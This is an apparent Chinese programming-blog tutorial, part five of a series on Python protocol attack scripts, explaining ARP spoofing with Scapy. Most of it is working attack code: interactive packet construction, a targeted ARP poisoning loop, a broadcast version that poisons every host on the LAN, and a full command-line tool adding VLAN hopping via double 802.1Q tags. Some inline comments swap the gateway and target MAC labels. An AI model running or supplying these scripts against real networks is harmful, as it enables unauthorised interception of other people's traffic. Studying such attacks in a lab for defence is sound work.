欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

程序员文章站 2022-05-16 21:26:52
...

ARP

arp协议

ARP(Address Resolution Protocol)即地址解析协议, 用于实现从 IP 地址到 MAC 地址的映射,即询问目标IP对应的MAC地址,位于数据链路层。

arp欺骗

ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning),通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,从而实现窃听数据包

构造数据包

环境

网关 : 10.35.71.254
目标机 : 10.35.71.205
攻击机 : 10.35.68.121

利用Scapy获取分别的ip地址

>>> getmacbyip('10.35.71.205')                                                    
'a0:8c:fd:1b:cb:90' #网关mac地址
>>> getmacbyip('10.35.71.254')                                                           
'74:25:8a:6a:09:1d  #目标机网络地址                                                         
>>> get_if_hwaddr('eth0')                                                                 
'00:0c:29:62:44:de' #自己的mac地址

ARP

>>> ls(ARP)
hwtype     : XShortField                         = (1)
ptype      : XShortEnumField                     = (2048)
hwlen      : FieldLenField                       = (None)
plen       : FieldLenField                       = (None)
op         : ShortEnumField                      = (1)
hwsrc      : MultipleTypeField                   = (None)
psrc       : MultipleTypeField                   = (None)
hwdst      : MultipleTypeField                   = (None)
pdst       : MultipleTypeField                   = (None)

构造ARP需要我们注意的有5个参数:

  • op 取值为1或者2,代表ARP请求或者响应包。

  • hwsrc 发送方Mac地址。

  • psrc 发送方IP地址。

  • hwdst 目标Mac地址。

  • pdst 目标IP地址。

ARP欺骗:发送arp包,让目标机以为是网关发过来的,并且网关mac对应的是攻击机ip,使目标机以为攻击机mac网关的mac

packet=Ether(src=攻击机mac,dst=目标机mac)/ARP(hwsrc=攻击机mac,hwdst=目标机mac,psrc=网关ip,pdst=目标机ip,op=1)


>>> mac_self = get_if_hwaddr('eth0')                                   
>>> mac_target = getmacbyip('10.35.71.205')   
>>>packet=Ether(src=mac_self,dst=mac_target)/ARP(hwsrc=mac_self,hwdst=mac_target,psrc='10.35.71.254',pdst='10.35.71.205',op=1)                 
>>> packet.show()                                              
###[ Ethernet ]### 
  dst= a0:8c:fd:1b:cb:90
  src= 00:0c:29:62:44:de
  type= 0x806
###[ ARP ]### 
     hwtype= 0x1
     ptype= 0x800
     hwlen= None
     plen= None
     op= who-has
     hwsrc= 00:0c:29:62:44:de
     psrc= 10.35.71.254
     hwdst= a0:8c:fd:1b:cb:90
     pdst= 10.35.71.205

正常的arp缓存表 arp -a

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

发送包

>>> sendp(packet,loop=1)       #sendp 发送二层包             ..............................................................................................................................................
[...]

毒化后

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

编写脚本

1.demo

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from scapy.all import (
    get_if_hwaddr,
    getmacbyip,
    Ether,
    ARP,
    sendp)

def arp_spoof(target,host,iface):
    # target 目标机ip
    # host   伪装的ip

    mac_self = get_if_hwaddr(iface)
    mac_target = getmacbyip(target)
    try:
        while 1 :
            sendp(Ether(src=mac_self,dst=mac_target)/
                  ARP(hwsrc=mac_self,hwdst=mac_target,psrc=host,pdst=target,op=1))

    except KeyboardInterrupt: #捕获Ctrl + C
            print('\n[+]Stopped poison')

if __name__ == '__main__':
    target = '10.35.71.205'
    host = '10.35.71.254'
    iface = 'eth0'
    arp_spoof(target,host,iface)

运行演示

Python 协议攻击脚本(五): ARP欺骗 Arpspoof

2.添加广播式的arp欺骗

这对局域网所有主机的进行欺骗,所有主机都会以为攻击机为网关

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from scapy.all import (
    get_if_hwaddr,
    getmacbyip,
    Ether,
    ARP,
    sendp)

def arp_spoof(target,host,iface):
    # target 目标机ip
    # host   伪装的ip

    mac_self = get_if_hwaddr(iface)

    #如果没有设置目标,则为广播形式
    if target:
        mac_target = getmacbyip(target)
        packet = Ether(src=mac_self, dst=mac_target) /\
        ARP(hwsrc=mac_self, hwdst=mac_target, psrc=host, pdst=target, op=1)
        print('[+]Poisoning --> ', target, end=' ')
    else:
        mac_borad = 'ff:ff:ff:ff:ff:ff'
        packet = Ether(src=mac_self, dst=mac_borad) /\
        ARP(hwsrc=mac_self, hwdst=mac_borad, psrc=host, pdst=target, op=1)
        print('[+]Poisoning --> Lan', end=' ')

    try:
        while 1 :
            sendp(packet,verbose=False)

    except KeyboardInterrupt: #捕获Ctrl + C
            print('\n[+]Stopped poison')

if __name__ == '__main__':
    target = ''
    host = '10.35.71.254'
    iface = 'eth0'
    arp_spoof(target,host,iface)

3.完善代码

加入了跨VLAN的功能

详见Python黑帽编程 3.4 跨域VLAN | 玄魂工作室

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from scapy.all import (
    get_if_hwaddr,
    getmacbyip,
    ARP,
    Dot1Q,
    Ether,
    sendp,
)
import argparse
import os
import sys
import time

mac_broad = 'ff:ff:ff:ff:ff:ff'

def arp_spoof(iface,target,host,vlan_own=False,vlan_target=False):
    #target 目标机ip
    #host   伪装的ip

    mac_self = get_if_hwaddr(iface) #自身mac

    if target:
        mac_target = getmacbyip(target) #目标机mac

        if not mac_target :
            print('[-]Error: Could not resole targets MAC address')
            sys.exit(1)

        ethernet = Ether(src=mac_self, dst=mac_target)
        arp = ARP(hwsrc=mac_self, psrc=host,hwdst=mac_target,pdst=target, op=1)
        print('[+]Poisoning --> ', target,end=' ')
    else:
        ethernet = Ether(src=mac_self, dst=mac_broad)
        arp = ARP(hwsrc=mac_self,psrc=host,op=1)
        print('[+]Poisoning --> LAN',end='')

    #判断是否加入Vlan标识
    if vlan_target:
        vlan_tag = Dot1Q(vlan=vlan_own)/Dot1Q(vlan_target)
        pkt =  ethernet/vlan_tag/arp
    else:
        pkt = ethernet/arp

    print(" ('Ctrl + C' stop)")

    try:
        while True:
            sendp(pkt,iface=iface,verbose=False)
    except KeyboardInterrupt:
            print('\n[+]Stopped poison')
            arp_recover(iface,host)

#发送正常的arp包
def arp_recover(iface,host):

    time.sleep(1)

    print('[*]Recovering the network')

    mac_host = getmacbyip(host)
    pkt = Ether(src=mac_host, dst=mac_broad)/ARP(hwsrc=mac_host, psrc=host, op=1)
    sendp(pkt,iface=iface,inter=1,count=2,verbose=False) #inter 发包间隔

    time.sleep(1)

    print('[+]Complete')

def main():

    if os.geteuid() != 0:
        print('[-]Need root user to run')
        sys.exit(1)

    usage = 'usage: arp_spoof.py [-h] [-i IFACE] [-t TARGET] [-vl vlan_own vlan_target] host'
    parser = argparse.ArgumentParser(usage=usage)
    parser.add_argument('-i','--iface',default='eth0',help='The network interface of use')
    parser.add_argument('-t','--target',help='Specify a target to ARP poison')
    parser.add_argument('-vl','--vlan',nargs=2,help='The vlan hopping of use eg:-vl 1 2')
    parser.add_argument('host',help='host of impersonate')

    try:
        args = parser.parse_args()
        iface,target,vlan,host = args.iface,args.target,args.vlan,args.host

        if vlan:
            arp_spoof(iface,target,host,vlan_own=vlan[0],vlan_target=vlan[1],)
        else:
            arp_spoof(iface,target,host)
    except ValueError:  #捕获输入参数错误
        parser.print_help()

if __name__ == '__main__':
    main()

参考

Python灰帽编程 3.1 ARP欺骗 | 玄魂工作室